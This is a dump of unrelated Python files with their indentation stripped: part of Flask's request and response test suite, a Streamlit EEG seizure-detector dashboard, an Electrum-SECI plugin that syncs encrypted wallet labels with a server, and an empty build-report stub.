assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if _trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if _trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for _trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert 'This was submitted: "index.txt"' in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return u"Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return u"Hällo Wörld".encode("utf-8")
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response("Hello world", 404, {"X-Foo": "Baz"}),
{"X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route("/dict")
def from_dict():
return {"foo": "bar"}, 201
assert client.get("/text").data == u"Hällo Wörld".encode("utf-8")
assert client.get("/bytes").data == u"Hällo Wörld".encode("utf-8")
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.headers.getlist("X-Foo") == ["Baz", "Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get("/dict")
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e.value)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e.value)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e.value)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python >= 3.7")
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder="", static_url_path="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder
# but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host
# but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 1.0 warning about name mismatch
with pytest.warns(None):
rv = client.get("/", "http://foo.localhost")
assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
AssertionError()
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
AssertionError()
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo.bar.baz", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.bar.baz.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.bar.baz.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route(u"/киртест")
def index():
return "Hello World!"
rv = client.get(u"/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e.value)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e.value)
assert ("Make sure to directly send your POST-request to this URL") in str(
e.value
)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for _x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# suppress Werkzeug 0.15 warning about name mismatch
with pytest.warns(None):
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
assert rv.status_code == 404 if matching else 204
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
assert rv.status_code == 404 if matching else 204
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View(object):
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = "running on %s:%s ..." % (hostname, port)
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == "running on %s:%s ..." % (hostname, port)
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(
monkeypatch, host, port, server_name, expect_host, expect_port, app
):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
|
newdes.py
|
import threading
import time
import altair
import numpy as np
from IPython.core.display_functions import display
from brainflow.board_shim import BoardShim, BrainFlowInputParams, BoardIds
import pandas as pd
import tkinter as tk
from tkinter import filedialog
from queue import Queue
from threading import Thread
from pathlib import Path
from numpy import NaN
from streamlit import caching
import streamlit as st
import yfinance as yf
import matplotlib.pyplot as plt
from streamlit.scriptrunner import add_script_run_ctx
class Client():
def __init__(self, datatype, q, q_for_ploting):
self.params = BrainFlowInputParams()
self.params.serial_port = 'com3'
self.params.board_id = 0
self.board = BoardShim(0, self.params)
self.datatype = datatype
self.file_path = None
self.fake_matrix = None
self.df = None
self.fake_df = None
self.times_to_go_over = 0
self.q = q
self.q_for_ploting = q_for_ploting
def start_print(self):
t2 = Thread(target=Client.print_data, args=(self,))
t2.start()
def print_data(self):
while True:
time.sleep(5)
# return 1
temporary_df = pd.DataFrame()
for i in range(self.q.qsize()):
temporary_df = pd.concat([temporary_df, self.q.get()])
self.q.task_done()
def start_collect(self, dataype):
t1 = Thread(target=Client.collect_data, args=(self, dataype))
t1.start()
def collect_data(self, datatype):
if datatype == 'real':
start_real = Real(self, self.q, self.q_for_ploting)
start_real.start_stream()
while True:
time.sleep(0.2)
d = start_real.read_data()
A = pd.DataFrame(d[0:6, :])
A = A.transpose()
A.columns = ["samples", "channel 1", "channel 2", "channel 3",
"channel 4", "channel 5"]
B = A
self.q.put(A)
self.q_for_ploting.put(B)
else:
start_fake = Fake(self, self.q, self.q_for_ploting)
start_fake.choose_file()
data = start_fake.read_file()
times = start_fake.passes_calc()
for i in range(times):
time.sleep(1 / 64)
temp_df = data[i * 4:i * 4 + 4]
self.q.put(temp_df)
self.q_for_ploting.put(temp_df)
class Real(Client):
def start_stream(self):
self.board.prepare_session()
self.board.start_stream()
def read_data(self):
data = self.board.get_board_data()
return data
def stop_stream(self):
self.board.stop_stream()
self.board.release_session()
class Fake(Client):
def choose_file(self):
root = tk.Tk()
root.withdraw()
self.file_path = Path(filedialog.askopenfilename())
return self.file_path
def read_file(self):
self.df = pd.read_csv(self.file_path, sep=" ", header=None,
names=["samples", "channel 1", "channel 2", "channel 3",
"channel 4", "channel 5"])
return self.df
def passes_calc(self):
rows = len(self.df.index)
self.times_to_go_over = int(np.floor(rows / 4))
return self.times_to_go_over
def streaming_app():
datatype = 'real'
q = Queue()
q_for_plotting = Queue()
c = Client(datatype, q, q_for_plotting)
st.set_page_config(page_title='Epileptic seizures detector/predictor', page_icon='😊')
st.image(r'BioMedTechnionLogoEngColorW2-NEW.png', width=500)
st.title("Epileptic seizures detector/predictor")
# hide the menu button
st.markdown(""" <style>
#MainMenu {visibility: hidden;}
footer {visibility: hidden;}
</style> """, unsafe_allow_html=True)
# condense the layout - remove the padding between components of website
padding = 0
st.markdown(f""" <style>
.reportview-container .main .block-container{{
padding-top: {padding}rem;
padding-right: {padding}rem;
padding-left: {padding}rem;
padding-bottom: {padding}rem;
}} </style> """, unsafe_allow_html=True)
# Using object notation
add_selectbox = st.sidebar.selectbox(
"Who would you like to contact in case of an emergency?",
("Contact1", "Contact2", "Contact3")
)
col1, col2, col3 = st.columns((10, 4, 1))
col1.header("Live Data")
col2.header("Result")
col2.text('No sign of seizure')
# col2.image("result.jpg", width=100)
c.start_collect(datatype)
c.start_print()
q.join()
placeholder = col1.empty()
placeholder_2 = col1.empty()
placeholder_3 = col1.empty()
data = pd.DataFrame()
time.sleep(2.5)
with st.sidebar:
add_radio = st.radio(
"are you wearing the deivce?",
("YES", "NO")
)
# lines = altair.Chart(data).mark_line().encode(x=altair.X('1:T'))
# # with placeholder.container():
# line_plot = st.altair_chart(lines)
# while True:
# data = abs(pd.concat([data, q_for_plotting.get() / 1000]))
# step_df = data.iloc[-500:, 1]
# lines = plot_animation(step_df)
# line_plot = line_plot.altair_chart(lines)
# time.sleep(0.1)
with placeholder.container():
while True:
fig, ax = plt.subplots(3)
data = abs(pd.concat([data, q_for_plotting.get() / 1000],ignore_index=True))
ax[0].plot(data.iloc[-500:, 1])
# ax[0].set_title('EEG 1')
ax[0].set_xticks([])
ax[0].set_yticks([])
ax[1].plot(data.iloc[-500:, 2])
# ax[1].set_title('\n EEG 2')
ax[1].set_xticks([])
ax[1].set_yticks([])
ax[2].plot(data.iloc[-500:, 3])
ax[2].set_xticks([])
ax[2].set_yticks([])
# ax[2].set_title('\n EEG 3')
plt.draw()
placeholder.plotly_chart(fig)
q_for_plotting.task_done()
time.sleep(0.01)
# with placeholder.container():
# fig = plt.figure()
# while True:
# test = [data,q_for_plotting.get() / 1000]
# data = abs(pd.concat[test,data])
# data = data.iloc[-500:, 1:4]
# placeholder.pyplot(fig)
# q_for_plotting.task_done()
# time.sleep(0.01)
# with placeholder.container():
# while True:
# data = abs(pd.concat([data, q_for_plotting.get() / 1000],ignore_index=True))
# chart = (
# altair.Chart(
# data=pd.DataFrame(data.iloc[-500:, :]),
# title="EEG Channel 1",
# )
# .mark_line()
# .encode(
# x=altair.X("samples", axis=altair.Axis(title="samples")),
# y=altair.Y("channel 1", axis=altair.Axis(title="channel 1")),
# )
# )
# placeholder = placeholder.altair_chart(chart)
# chart = (
# altair.Chart(
# data=pd.DataFrame(data.iloc[-500:, :]),
# title="EEG Channel 1",
# )
# .mark_line()
# .encode(
# x=altair.X("samples", axis=altair.Axis(title="samples")),
# y=altair.Y("channel 2", axis=altair.Axis(title="channel 2")),
# )
# )
# placeholder_2 = placeholder_2.altair_chart(chart)
# chart = (
# altair.Chart(
# data=pd.DataFrame(data.iloc[-500:, :]),
# title="EEG Channel 1",
# )
# .mark_line()
# .encode(
# x=altair.X("samples", axis=altair.Axis(title="samples")),
# y=altair.Y("channel 3", axis=altair.Axis(title="channel 3")),
# )
# )
# placeholder_3 = placeholder_3.altair_chart(chart)
# q_for_plotting.task_done()
# time.sleep(0.01)
# with placeholder.container():
#
# while True:
#
# data = abs(pd.concat([data, q_for_plotting.get() / 1000]))
# placeholder.line_chart(data.iloc[-256:, 1:4])
#
# q_for_plotting.task_done()
# time.sleep(0.01)
streaming_app()
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
import electrum_seci
from electrum_seci.plugins import BasePlugin, hook
from electrum_seci.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.bauerj.eu'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = electrum_seci.bitcoin.aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted)
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = electrum_seci.bitcoin.aes_decrypt_with_iv(password,
iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if not wallet in self.wallets:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise BaseException(response.status_code, response.text)
response = response.json()
if "error" in response:
raise BaseException(response["error"])
return response
def push_thread(self, wallet):
wallet_id = self.wallets[wallet][2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.iteritems():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_id = self.wallets[wallet][2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
try:
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.print_error("could not retrieve labels")
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
password = hashlib.sha1(mpk).digest().encode('hex')[:32]
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).digest().encode('hex')
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
BuildReport.py
|
## @file
